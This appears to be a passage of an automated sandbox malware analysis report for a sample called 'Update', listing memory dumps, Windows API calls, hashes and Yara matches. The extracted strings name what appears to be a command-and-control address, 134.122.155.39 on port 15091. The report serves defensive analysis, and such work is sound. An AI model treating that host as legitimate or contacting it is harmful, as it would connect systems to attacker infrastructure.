• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID:
• API String ID: 615853336-0
• Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
• Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
• Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
• Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740

APIs
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: _strlen$Sleep
• String ID:
• API String ID: 2737124692-0
• Opcode ID: f07909a9dc8c423473a4fae108e715d64086076ac504870c4920282daa960c68
• Instruction ID: 373fd525b6312fdb20617fcfad33c762e1bb8ff624fa6968bc7fbbbbc9a89e41
• Opcode Fuzzy Hash: f07909a9dc8c423473a4fae108e715d64086076ac504870c4920282daa960c68
• Instruction Fuzzy Hash: 516106F2C122149BDB10CF64DC407DD7BB5EF49314F25032AE855AB7C1E7759A488BA2

APIs
  • Part of subcall function 6C381070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6C381124
  • Part of subcall function 6C381070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C38115F
• Sleep.KERNEL32(000000C8), ref: 6C383DFC
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: AttributesFileIos_base_dtorSleepstd::ios_base::_
• String ID: $jIk
• API String ID: 3742752172-1761899760
• Opcode ID: 0d5619d87b36b9703cb49e5804fd5135d7373feda3e19297470632517007fe68
• Instruction ID: ae8136fa5cdb8cb2896006b75fdcd68462301e588b25d9df4b5b7ce351eff516
• Opcode Fuzzy Hash: 0d5619d87b36b9703cb49e5804fd5135d7373feda3e19297470632517007fe68
• Instruction Fuzzy Hash: 2451BDB2D053948BDB11CF64C9407EDBBB2BF99304F158299D84867242EB746AC9CF91

APIs
• GetCurrentThreadId.KERNEL32 ref: 034E316B
• InterlockedExchange.KERNEL32(?,00000001), ref: 034E3183
• GetCurrentThreadId.KERNEL32 ref: 034E322F
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CurrentThread$ExchangeInterlocked
• String ID:
• API String ID: 4033114805-0
• Opcode ID: 8b9aa04f4d560e7b70a6d82f1cb13a92d25c161efee8f80f3ad64f363db38682
• Instruction ID: 2f4812476e61d1df25e515f44726f6f813eeff5157aab60666c233adbb522564
• Opcode Fuzzy Hash: 8b9aa04f4d560e7b70a6d82f1cb13a92d25c161efee8f80f3ad64f363db38682
• Instruction Fuzzy Hash: A7318A78200602AFC719DF69C984A6AB3E9FF44706B10C56EE85A8F614D731E842CB84
APIs
• __floor_pentium4.LIBCMT ref: 034E11E9
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 034E1226
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 034E1255
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• __floor_pentium4.LIBCMT ref: 100011E9
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• __floor_pentium4.LIBCMT ref: 034E112F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 034E115F
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 034E1192
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• __floor_pentium4.LIBCMT ref: 1000112F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 034E9E04
• GdipDisposeImage.GDIPLUS(?), ref: 034E9E18
• GdipDisposeImage.GDIPLUS(?), ref: 034E9E3B
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Gdip$DisposeImage$BitmapCreateFromStream
• String ID:
• API String ID: 800915452-0
APIs
• EnterCriticalSection.KERNEL32(0350FB64), ref: 034E9ADC
• GdiplusStartup.GDIPLUS(0350FB60,?,?), ref: 034E9B15
• LeaveCriticalSection.KERNEL32(0350FB64), ref: 034E9B26
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterGdiplusLeaveStartup
• String ID:
• API String ID: 389129658-0
APIs
• DeleteFileW.KERNEL32(6C3951D8,?,6C3951D8,?,?,?,0000000F), ref: 6C3A3586
• GetLastError.KERNEL32(?,6C3951D8,?,?,?,0000000F), ref: 6C3A3590
• __dosmaperr.LIBCMT ref: 6C3A3597
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: DeleteErrorFileLast__dosmaperr
• String ID:
• API String ID: 1545401867-0
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: Sleep
• String ID: 134.122.155.39$15091
• API String ID: 3472027048-2986009996
APIs
• __getptd_noexit.LIBCMT ref: 1000715B
  • Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
  • Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
  • Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
  • Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
  • Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
  • Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904
• __freeptd.LIBCMT ref: 10007165
  • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
  • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
  • Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
  • Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
  • Part of subcall function 10009A58: TlsSetValue.KERNEL32(0000001F,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE
• ExitThread.KERNEL32 ref: 1000716E
Memory Dump Source
• Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_Update.jbxd
Similarity
• API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
• String ID:
• API String ID: 4224061863-0
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: DeleteFile
• String ID: '
• API String ID: 4033686569-1997036262
APIs
• WSAStartup.WS2_32(00000202,?), ref: 6C38685B
Strings
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: Startup
• String ID: 134.122.155.39
• API String ID: 724789610-3106377314
                                                                                            • Opcode ID: e4e24905f9c0b3b0a3c171da6e3b0ea340ea1d8c32de3dc1d449c95b53099aeb
                                                                                            • Instruction ID: 822eeee40e24e1d49ce4e7ecfd70bdcaacb837508d06defa5c26ea0f803134f0
                                                                                            • Opcode Fuzzy Hash: e4e24905f9c0b3b0a3c171da6e3b0ea340ea1d8c32de3dc1d449c95b53099aeb
                                                                                            • Instruction Fuzzy Hash: 7DE065714183419AE300DF11C908BABBBF8EFDA30CF415B0DF4C865081D3B856888B67
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0304022B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                            • Instruction ID: e3edd3a083fe51fe594fe4cdc5250798d77fd7487ccd55a6309e2b3344abc351
                                                                                            • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                            • Instruction Fuzzy Hash: C8A15DB0A01606AFDB54CFA9C880AAEF7F5FF48305B1885B9E515E7651E730EA50CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e36b5f64728c11e6898cc46b9ae3fcc362dbf676d2c695999279c5ffc4c7c601
                                                                                            • Instruction ID: fd72e722bdea6dc140325c04f879ec46b6386fc147a1ea78641c577341427134
                                                                                            • Opcode Fuzzy Hash: e36b5f64728c11e6898cc46b9ae3fcc362dbf676d2c695999279c5ffc4c7c601
                                                                                            • Instruction Fuzzy Hash: BD910275A02744CFDB14CF28C880B9ABBB6FF89314F108559E8699B791D730E945CFA1
                                                                                            APIs
                                                                                              • Part of subcall function 6C3A15C6: GetConsoleOutputCP.KERNEL32(F1BBC535,00000000,00000000,?), ref: 6C3A1629
                                                                                            • WriteFile.KERNEL32(?,6C3A07FB,00000000,6C3AB0A5,00000000,6C3A07FB,00000000,00000000,?,6C3AB0A5,00000000,00000000,6C3AAFE2,6C3A07FB,00000000,?), ref: 6C3A13A1
                                                                                            • GetLastError.KERNEL32(?,6C3AB0A5,00000000,00000000,6C3AAFE2,6C3A07FB,00000000,?,6C3AA281,00000000,6C3A07FB), ref: 6C3A13AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2915228174-0
                                                                                            • Opcode ID: 317165dcb89c261e499fcf8011788ca8c52090a8c81c9f24b7b68d0c7d327494
                                                                                            • Instruction ID: 045d071f493ca98cbd1394d5489b4860cb2a270104cc1bbdd7482e33b0e84a9b
                                                                                            • Opcode Fuzzy Hash: 317165dcb89c261e499fcf8011788ca8c52090a8c81c9f24b7b68d0c7d327494
                                                                                            • Instruction Fuzzy Hash: 35619072914119EFDF01CFE8C844AEEBBB9EF4A308F140189E950A7645D332D926CFA1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __fread_nolock
                                                                                            • String ID:
                                                                                            • API String ID: 2638373210-0
                                                                                            • Opcode ID: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
                                                                                            • Instruction ID: 72b3564e246b8f9ae1eabee60b055bf473d4ab7fac7b3b4754ca911924c75e25
                                                                                            • Opcode Fuzzy Hash: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
                                                                                            • Instruction Fuzzy Hash: 845105327042148FC7648E2DC880B1AB3E5AF89718F16966DF899CB790D736DC15CFA5
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time_memmovetime
                                                                                            • String ID:
                                                                                            • API String ID: 1463837790-0
                                                                                            • Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                                            • Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
                                                                                            • Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                                            • Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90
                                                                                            APIs
                                                                                              • Part of subcall function 6C393EF1: GetSystemTimeAsFileTime.KERNEL32(6C371A64,?,?,?,?,?,6C371A64,00000000), ref: 6C393F06
                                                                                              • Part of subcall function 6C393EF1: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C393F25
                                                                                            • Sleep.KERNEL32(00000064), ref: 6C371B6C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: gfff
                                                                                            • API String ID: 2563648476-1553575800
                                                                                            • Opcode ID: f29dd931424788968dd50fb0b5b850cf296d921a5c41a874d51e38641d0e1c79
                                                                                            • Instruction ID: 92627441bedaec059d381e668436942cc82426d78cb9766e3955c3eb0694bc6e
                                                                                            • Opcode Fuzzy Hash: f29dd931424788968dd50fb0b5b850cf296d921a5c41a874d51e38641d0e1c79
                                                                                            • Instruction Fuzzy Hash: 5051D7B2D002488FDB20CFB9D8247EDBBB4EB45319F048229D419E7790E7799549CFA6
                                                                                            APIs
                                                                                            • __RTC_Initialize.LIBCMT ref: 6C38CE68
                                                                                              • Part of subcall function 6C38D21A: InitializeSListHead.KERNEL32(6C3BCA10,6C38CE72,6C3B9C08,00000010,6C38D00B,?,00000000,?,00000007,6C3B9C28,00000010,6C38D01E,?,?,6C38D0A7,?), ref: 6C38D21F
                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C38CED2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                            • String ID:
                                                                                            • API String ID: 3231365870-0
                                                                                            • Opcode ID: a16907a1ce6f9783ef2c076036ac13694c6dd4713412e646d7635ddd80679a6c
                                                                                            • Instruction ID: c987f161d2627508082c3c6e58d2b09101fbcebb0196af6cd8f2477c7f6493cc
                                                                                            • Opcode Fuzzy Hash: a16907a1ce6f9783ef2c076036ac13694c6dd4713412e646d7635ddd80679a6c
                                                                                            • Instruction Fuzzy Hash: 8A21F6322472419ADB00BFB8B4007D837B0AF567AEF14495AD4C567EC1DB3660098F6A
                                                                                            APIs
                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 034E3043
                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 034E3064
                                                                                              • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                            • String ID:
                                                                                            • API String ID: 4248608111-0
                                                                                            • Opcode ID: 28ed305741bda30244d26284ffc237879ab21f12c9ee9edfccb96fac41358fac
                                                                                            • Instruction ID: 85c248e0bf32bf7a0f85a2f3943eb46d15cad4a126cf1bd48442978bfcccd45f
                                                                                            • Opcode Fuzzy Hash: 28ed305741bda30244d26284ffc237879ab21f12c9ee9edfccb96fac41358fac
                                                                                            • Instruction Fuzzy Hash: 2621E4745003089FDB31EF65DC88B9B73A4EF04313F0905EAE9445F294D770A984CBA9
                                                                                            APIs
                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 10003044
                                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                            • String ID:
                                                                                            • API String ID: 4248608111-0
                                                                                            • Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                                            • Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
                                                                                            • Opcode Fuzzy Hash: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                                            • Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1
                                                                                            APIs
